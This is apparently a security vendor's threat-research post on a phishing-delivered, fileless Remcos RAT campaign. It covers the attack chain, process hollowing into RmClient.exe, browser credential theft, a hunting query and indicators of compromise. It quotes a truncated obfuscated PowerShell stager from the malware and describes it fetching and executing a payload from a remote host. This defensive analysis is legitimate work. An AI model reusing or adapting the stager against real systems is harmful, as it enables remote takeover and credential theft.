SPEAK WITH AN EXPERT

Fileless Remcos Attacks on the Rise 

Contributors: Veena Sagar, Niranjan Jayanand, Archana Manoharan

 

CyberProof researchers saw a spike in the Remcos (Remote Control & Surveillance Software) campaign in September and October 2025 as it spread through emails and social engineering tricks. Remcos is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes but has been used in numerous hacking campaigns. Once installed, Remcos opens a backdoor on the device/computer, granting full access to the remote user. 

CyberProof Threat Researchers were able to understand how attackers were successful in bypassing EDRs using highly obfuscated code while trying to access browser information through injecting  Remcos code into RMClient – a Microsoft distributed file. The motivation of these campaigns looks to be credential theft through opportunistic targeted attacks. We suspect attackers also compromised some legitimate websites to host additional files in this operation. CyberProof will continue to monitor this campaign and will share any additional findings as updates to this article. 

Technical Details 

Here are the sequence of events and technical details in the most recent Remcos incident CyberProof Threat Researchers identified:  

In the most recent Remcos incident we witnessed an attack where a user received an email with an attachment named ‘EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz’.  

A screenshot of a cybersecurity interface shows the process tree of userinit.exe, explorer.exe, and msedge.exe, highlighting a suspicious file named

Fig. 1: Image shows user tricked to download attachment through edge browser 

This archive is extracted to drop a batch file like this :  C:\Users\<username>\AppData\Local\Temp\00f764ae-38a7-46c6-9b3e-5131512535c7_EFEMMAK TURKEY INQUIRY ORDER NR 09162025 (2).gz.5c7\EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat’. 

A screenshot displays file details for

Fig. 2: Shows the inner batch file 

This batch file then executes an obfuscated PowerShell script  as shown below utilising functions like ‘Lotusblo’ and ‘Garrots’ shown in the code snippet in later section. 

A screenshot of a process tree showing the execution flow from userinit.exe to explorer.exe, then cmd.exe, and finally powershell.exe, with file paths and process IDs visible.

Fig. 3: Launch of PowerShell script from batch file 

(Hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e) 

  1. The script initiates a hidden PowerShell process and employs a custom string de-obfuscation function and dynamic code execution using Invoke-Expression. It configures web requests to use TLS 1.2 and a custom User-Agent string. The script then constructs a target file path at C:\Users\<username>\AppData\Roaming\Hereni.Gen. It then attempts to download a file from hxxps://icebergtbilisi.ge/Sluknin.afm to this path in a continuous loop, pausing for 4 seconds between attempts, until the file is successfully downloaded. After a successful download, the script reads the content of this file, Base64 decodes it, and then attempts to decompress it using GZip. The resulting decompressed data stream object is subsequently passed to Invoke-Expression, indicating an attempt to execute the retrieved payload. 

Below is a code snippet of PowerShell code that launches next stage of attack through msiexec. 

 
powershell.exe  -windowstyle hidden “spsv exergonic;function Lotusblo ($fremhvels){ $prci=3;do {$aaenaand+=$fremhvels[$prci];$prci+=4;$tradsti=Compare-Object vandfa fusela15}until (!$fremhvels[$prci])$aaenaand}function Garrots ($subflavou){.($realek) ($subflavou)}$nonex=Lotusblo ‘{{{N{{.E {{T{{{.{{{w’;$nonex+=Lotusblo ‘GGGeGG B,GGcGGGLGGGiGGGEGG n,GGt’;$easinesses=Lotusblo ‘ ;;M ;;o ;;z;;;i ; l  ;l;;;a;;;/’;$emball=Lotusblo ‘P,PTPP.lPPPsPPP1PP 2′;$unhastyu=’iii[ii,NiiiE iiTiii.iiiSi,ieiiir iiV .iiiiiCiiieiiip iiOiiiiiiiniiit iim iiAiiin iiAiiigiiieiiiriii]iii:i,i:iiiS i,eiiiciiiu iiriiiiiiitii Y  ip i Rii.OiiitiiiO iiCii o iiliii=iii$iiiEii miiiBiiia iiL  il’;$easinesses+=Lotusblo ‘………………………………… 

…………..;$modific=Lotusblo ‘S S>’;$realek=Lotusblo ‘]] I ]]e ]]x’;$home=’john’;$tineidsma=’\Hereni.Gen’;Garrots (Lotusblo ‘) 

The code is responsible to launch msiexec.exe from powershell.exe as shown below 

PowerShell created process msiexec.exe on Sep 16, 2025, with process ID 22848. The event type is marked as

Fig. 4: PowerShell launches msiexec.exe 

From device timeline, we get to see that msiexec.exe used process hollowing to inject itself into RmClient.exe. 

A process tree shows powershell.exe, msiexec.exe, and RmClient.exe accessing browser saved password files, with alerts for possible theft of passwords and web browser info.

Fig. 5: Defender showing alert on process injection of msiexec into RMClient.exe 

The injected code is Remcos RAT trying to access browser saved password files, which alerted the MDR, thanks to partial EDR alerts at this stage: 

Fig. 6: Alert timeline shows partial alerts when browser files were touched 

The hash of RmClient ‘8f6a3b111f6e0498cb677b175966175bfa53e58c9fb41ddb63c7b7568e24c760’ seen in this incident is distributed by Microsoft 

Screenshot of a security analysis report for the file RmClient.exe, showing no malicious activity detected and displaying file hashes and distribution details.

Fig. 7: Image showing RMClient hash information from VirusTotal 

We checked with msiexec’s process ID to understand additional activities: 

A screenshot of a code query and its results in a security monitoring tool, displaying file paths, process names, and timestamps; a sensitive field is redacted.

Fig. 8: Analysis on executions initiated from msiexec.exe based on process ID shows random file names dropped in Temp directory. 

Additionally, we have reviewed network connections initiated from msiexec.exe ( by checking its process ID) and observed the below connections including C2 urls 

Alert showing msiexec.exe made outbound communication with IP 89.238.176.5 on uncommon port 57864, flagged as T1095 and T1571, with user information redacted.

Fig. 9: msiexec making remote connection 

Further investigation revealed more network connections launched by msiexec.exe. 

A screenshot of a query in a database tool showing filtered results with columns for Timestamp, ActionType, and other connection details. A section of the query is highlighted in red.

Fig 10: More network connections by msiexec 

Fig. 11: Above connection by msiexec was seen failed 

Below image shows the GET request to malicious C2 domain and User-Agent used when retrieving random file names. 

A network request and response log shows a GET request to a .bin file with details such as IP address, user agent, response code 200, server info, and content type.
A screenshot of a HTTP GET request and response header details, including remote address, request details, and server response for cbcbergbiltis.ge/Suknia.afm.

Hunting Query 

 
union DeviceEvents, DeviceProcessEvents 

| where FileName contains “rmclient.exe”  

| where ProcessCommandLine contains “AppData\\Local\\Temp” 

| project Timestamp, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessParentFileName 

Below image shows the hunting query shared, capturing related events to this Remcos events. 

Fig. 11: Our hunting query captures events related to injected RMClient launched by msiexec 

Configuration file 

Below image shows the config file extracted by tria.ge classifying the file to be Remcos RAT. 

Text showing software family

Indicators of Compromise

  • Ablelifepurelife[.]ydns.eu 
  • ablelifepurelifebk[.]ydns.eu 
  • icebergtbilisi[.]ge 
  • Email attachment name: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz 
  • Attachment hash: 5eb460204cd0f5510b146b8465b4392e9d0795b5d7fdb51b1c1429f97593a4b3 
  • Batch script file: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat 
  • Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e 
  • PowerShell content hash: 3ec5b13ee66d84dd75ac619ebb79c64cef7986dd6e8049f689f9ac39c272fea2 
  • icebergtbilisi[.]ge 
  • Sluknin.afm 
  • LAUFENDES PROJEKT 092225 NORDRHEIN WESTFALEN CHARGE MATERIALIEN�MUSTEREINREICHUNG SOWIE ANGEBOTSANFRAGE.js 
  • ON GOING PROJECT 091704 SUBSEQUENT BATCH MATERIALS SAMPLE SUBMITTAL AS WELL AS QUOTATION REQUEST FOR ORDER.js 
  • PROJECTO EM CURSO 091704 LOTE LISBOA ENVIO DE MATERIAIS� AMOSTRAS E PEDIDO DE ORCAMENTO.bat 
  • Attn Zapytanie ofertowe 03-270123-0612 DODATKOWE DOSTAWY MAGAZYNU  ZAMOWIENIE 03-310123-0614.bat 

Recommendations 

  • Invest in Employee Training: Employees are often the first line of defense against cyber threats. Training staff to recognize phishing emails, suspicious links, and other common attack vectors is critical. Regularly updated cybersecurity training programs ensure employees stay aware of evolving threats and adhere to best practices.  
  • Leverage Advanced Platforms: Modern threat detection platforms equipped with real-time monitoring, AI-driven threat intelligence, and automated response mechanisms are indispensable. These tools enable organizations to detect and neutralize threats swiftly, minimizing potential damage.  
  • Perform Regular Audits: Routine evaluations of your cybersecurity framework help identify and address vulnerabilities. Audits also ensure compliance with regulatory standards and improve the overall robustness of your security posture. 

Conclusion 

Tracking the evolution of commodity malwares and their usage in global campaigns are difficult due to their usage frequency. We highly recommend that organizations keep their security solutions updated. Specifically threat hunting teams must stay vigilant since upon successful infection, these commodity malwares steal credentials which are later used for targeted attacks that have been observed to serve ransomware in multiple instances.  

CyberProof Advanced Threat Hunting service covers the gaps that EDR detection misses enabling MDR teams and Detection engineering teams to stay ahead of such evolving malware attacks.